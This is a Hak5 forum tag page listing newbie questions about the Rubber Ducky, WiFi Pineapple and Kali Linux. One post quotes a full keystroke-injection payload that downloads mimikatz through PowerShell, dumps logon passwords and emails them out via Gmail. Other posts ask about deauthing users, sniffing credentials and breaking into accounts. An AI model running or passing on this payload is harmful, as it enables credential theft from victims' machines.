Jump to content

Search the Community

Showing results for tags 'newbie'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests

Found 13 results

  1. Hello, so i recently got challenged by my friend to beat him on something called readtheory and i kinda saw him cheat thru some code or something so i wonder if any of you guys know how to find answers in codes. there is multiple answers and i want to know how to find the correct one. Pls helperino <3 :D
  2. Im looking for some ideas on how to work on and practice using kali linux for the purpose of pen-testing and using all the various functions kali comes with. Things to bare in mind: I am fairly new to this, I have more then one computer, Im looking to aggressively expand my knowledge in this area, and of course i wanna be able to do this w/o breaking or damaging anything. Thoughts and suggestions, please and thank you!
  3. Hey Buddies a Newbie here, i watched https://www.youtube.com/watch?v=0UmJLLTr2gg i i have seen in video beside normal ducky there were micro ducky by having SD card. I didnt got any link to buy those any where? can anyone help here getting it ?
  4. Hello, I just got my RubberDucky. I rolled through the hello world example. It worked. After that I attempted to load, "YouveBeenUglyRolled By petertfm" on the ducky. I removed the hello world txt file first then loaded the YouveBeen.....txt file and the Ducky would when reimplemented would execute the hello world.txt file that was no longer on the SD card so.... I got frustrated and tried a few and accidentally deleted my inject.bin file. Now my ducky is dead in the water. Where can I get a copy of the inject.bin file? Please advise.
  5. Hi guys, I just got my rubber ducky and I'm having a little trouble using as I'm a newbie. I've been trying to use the Payload download mimikatz, grab passwords and email them via gmail but I get an error code when it comes to download mimikaz. (I know my emails and passwords lol) I've pasted the error and bin file content that I've been having trouble with. If someone could please help that would be awesome!!!! I also don't get how to install twin duck but I've just created this account so I'll check the forum to see if I find something but if someone would be kind enough to give me a step by step instruction and explanation that would be greatly appreciated. -------Error Message------- C:\WINDOWS\system32>powershell if ([System.IntPtr]::Size -eq 4) { (new-object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/i2ppl8v3xjeq8ju/mimikatz.exe?dl=0','%TEMP%\pw.exe'); }else{ (new-object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/buorl25jw20ss8p/mimikatz.exe?dl=0','%TEMP%\pw.exe');} Exception calling "DownloadFile" with "2" argument(s): "The remote server returned an error: (460) status code 460." At line:1 char:200 + ... e'); }else{ (new-object System.Net.WebClient).DownloadFile('https://w ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : WebException -----------Bin content--------- DELAY 1000 CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 CTRL-SHIFT ENTER DELAY 1000 ALT y ENTER DELAY 300 REM -------------download appropriate mimikatz for architecture STRING powershell if ([System.IntPtr]::Size -eq 4) { (new-object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/i2ppl*****jeq8ju/mimikatz.exe?dl=0','%TEMP%\pw.exe'); }else{ (new-object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/buorl25j*****8p/mimikatz.exe?dl=0','%TEMP%\pw.exe');} ENTER DELAY 5000 REM -------------get the passwords and save to c:\pwlog.txt STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt; ENTER DELAY 2000 STRING privilege::debug ENTER DELAY 1000 STRING sekurlsa::logonPasswords full ENTER DELAY 1000 STRING exit ENTER DELAY 300 STRING del %TEMP%\pw.exe ENTER DELAY 300 REM -------------email log via gmail STRING powershell ENTER DELAY 300 STRING $SMTPServer = 'smtp.gmail.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('******@gmail.com', 'MYPASSWORD'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = '*******@gmail.com' ENTER STRING $ReportEmail.To.Add('*******@gmail.com') ENTER STRING $ReportEmail.Subject = 'Duck Report' ENTER STRING $ReportEmail.Body = 'Attached is your duck report.' ENTER STRING $ReportEmail.Attachments.Add('c:\pwlog.txt')
  6. Hello there. i am quite new to coding and such, and i would like if anyone could help me? like help with programs used like Kali Linux and just general help... btw i am not very good at English so please forgive my writing flaws... i am doing my best a the moment to learn coding and writing better as i have found writing is an extremely important part
  7. I've had a play around with my tetra and so far am happy with it. Have a few questions: Can reaver crack encrypted wifi? If I already know wifi password can I use the tetra to sniff credentials of those already on the same encrypted wifi? Can I deauth someone from an encrypted wifi over and over so they look at using open wifi? Or is this part of the four/six way handshake In terms of mobile data canany of this data be sniffed with any modules? I assumed that the pineapple can do this but it doesn't seem to, can someone point me to the right module: Device broadcasts remembered ssid...open and encrypted Tetra reads this and responds The two pair up Currently all im seeing from pineap is thw broadcast of nearby wifis and i can spoof this and then user manually connects
  8. Hy guys, i'm a newbie and this is my first post, I just need someone to teach me where to beggin hacking and stuff Thanx :)
  9. Ok, so i just bought the field kit and have been having a blast, the one thing i cant figure out for the life of me (and ive been googleing this like a Mother F***er) is what the flash-drive like think is that comes with the ducky. This is a picture of the thing I'm talking about, if some one could tell me that its for that would me awesome (just started playing with this preticular toy) thanks in advance -N1ght
  10. Alright, I'll be that guy. I'm assuming this process is so easy that no doc was needed and I just missed something weird. You guys help me out and if we think a doc is needed, I agree to write it. Unboxed the Tetra, and plugged up the y cable. Since the first step seems to be firmware related, I also plugged in the wall power. Opened a browser (tried Chrome and Firefox) and went to 172.16.42.1:1471. No joy. Verified that middle LED is solid blue, so I'm assuming unit is "booted". Try again. No joy. Tried the other micro USB port, same process. No joy. Tried to connect up an ethernet cable. The video I found for the Mark V said it would hand out a DHCP address, but no joy. Hard coded myself as 172.16.42.2/24. No joy in the browser again. But I do notice a yellow/amber light. Progress? Don't know. Tried pinging it (I don't know the product well enough yet to know if ICMP is on or off). No reply. Turned on wireless adapter on my computer and I see a pineapple related SSID. Connect up, get to the unit through the browser, update the firmware, reboots. It advises turning off the wireless for security during setup. Well crap. Figure I have to not be afraid to play with this crap right? Turn it off (basically briefly hold down the reset button, instead of a long hold) and when it reboots, no wireless. Go through the whole thing again. I am plugged into the wall, I have tried the Y cable to both ports, and I have tried an ethernet cable. I don't seem to be able to get to this joker except through wireless. No biggie, I'm sure I can SSH or telnet or something to it. Look through the forums and it appears there is SSH capability. Download Putty. Without more to go on, I leave Putty at default (more than happy to make changes if anyone has something like, "Oh it HAS to be SSH v1"). SSH to 172.16.42.1, timeout. No joy. I try to get to is serial. Like I would to console into a Cisco switch. No joy. No timeout, but no joy. No ping, that may be expected, no SSH, no HTTP, but I have a feeling if I reset it and turn back on wifi, I'll get in. Can anyone help me get past this first little hurdle? Like I said, I'll doc it. I have to be missing something stupid. You guys have to realize that us Windows users need a little hand holding right? :) Holler. Oh yeah, one more thing. If I unplug the wall power, the lights go out. Maybe my USB ports are both bad? Sorry guys, I'm just not sure yet how to troubleshoot this unit any more to tell you what is and isn't working. All I really notice is the LED is either on or off. I just reset it and sure enough, I can get to it over wifi.
  11. Hello Everybody! I introduce myself, I am new into the forum. I am just going to order my ducky in the few days but I have some questions. 1. The only avaiable ducky model at now is the deluxe one? 2. What is Twin Ducky? A mod for a normal (or deluxe) ducky? 3. Where are the scripts stored, micro SD card? Can I store files into the same micro SD (Twin Ducky is something like that i believe) 5. How is the support for Spanish keyboards? Official? Is it nice? 4. What is ducky encoder? Is it like a firmware for our duckys? Can I update it´s firmware? Thanks in advance everybody! PD: Do you know any HakShop disscount code, don´t you? haha :P
  12. So basically I am new to the forum here and before visiting this, through search terms 'DDOS' (Because of LizardSquad), I thought I was pretty good in Hacking.. Well Not really, I don't even know the basics of hacking and I am quite interested in learning. Hopefully if you guys help me I might get better and yeah.. I'd like to start off with a question. How can I hack into a profile? Not through Phishing though.. I know you guys will get angry and call me a Noob or something but yeah I stated I am not very good at it that's why I am here to learn. Thanks
  13. Hello all Please bear with me and be gentle if i need step by step instructions, as I'm new to Kali linux and just getting to grips with some of the basic commands but I have many years tinkering with the Bill Gates products. I am trying to get my Pineapple V to work with either of my USB 3g modems. I have a Huawei E1752 and a vodafone K3565 rev2 which I believe also goes by the name of Huawei E160X and both of which have been unlocked to all networks (GSM). I have plugged of them into the Pineapple but have not been able to get either of them to connect to the internet. I have spent hours searching the internet for the APN settings but they don't seem to include the most of the settings that the Pineapple has options for except APN. I must admit I am even having difficulty in finding out if the Pineapple even recognizes either of these modems. Any help welcome and greatly appreciated! Ken
×
×
  • Create New...